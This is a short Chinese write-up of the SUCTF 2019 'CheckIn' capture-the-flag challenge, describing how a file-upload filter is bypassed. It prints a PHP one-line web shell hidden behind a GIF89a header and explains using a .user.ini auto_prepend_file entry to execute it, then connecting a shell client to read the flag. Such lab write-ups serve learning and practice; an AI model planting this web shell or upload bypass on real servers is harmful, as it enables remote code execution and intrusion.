[SUCTF 2019]CheckIn1

黑名单过滤后缀'ph',并且白名单image类型要有对应文件头

对<?过滤,改用GIF89a<script language='php'>@eval($_POST['cmd']);</script>,成功把getshell.gif上传上去了

尝试用.htaccess将上传的gif当作php解析,但是失败了

根据这篇文章.user.ini文件构成的PHP后门 - phith0n (wooyun.js.org)

上传.user.ini使用auto_prepend_file=<specific_file>将指定文件包含到当前目录下的php文件前

可以看到getshell.gif的文件头已经显示出来了,说明成功包含getshell.gif,后面跟着的一句话木马自然可以运行

连接蚁剑找到flag

相关推荐
dal118网工任子仪2 天前
135,【2】 buuctf web bestphp‘s revenge
安全·web
lally.3 天前
web信息泄露 ctfshow-web入门web1-web10
web·ctf·信息泄露
Golinie6 天前
【Gin】Web框架开发快速入门
golang·web·gin·后端开发
dal118网工任子仪7 天前
127,【3】 buuctf [NPUCTF2020]ReadlezPHP
安全·web
Maybe_ch8 天前
.NET Web-静态文件访问&&目录浏览
.net·web
CodeCraft Studio8 天前
如何使用DHTMLX Scheduler的拖放功能,在 JS 日程安排日历中创建一组相同的事件
javascript·ui·web
B站计算机毕业设计超人9 天前
计算机毕业设计制造业MES生产管理平台 MES 生产制造源码+文档+运行视频+讲解视频)
java·spring boot·mysql·eclipse·tomcat·maven·web
CodeCraft Studio10 天前
【对比测评】 .NET 应用的 Web 视图控件:DotNetBrowser 或 EO.WebBrowser
前端·.net·web
二掌柜,酒来!11 天前
响应式编程库(三) -r2dbc
java·adb·web
dal118网工任子仪13 天前
113,【5】 功防世界 web unseping
安全·web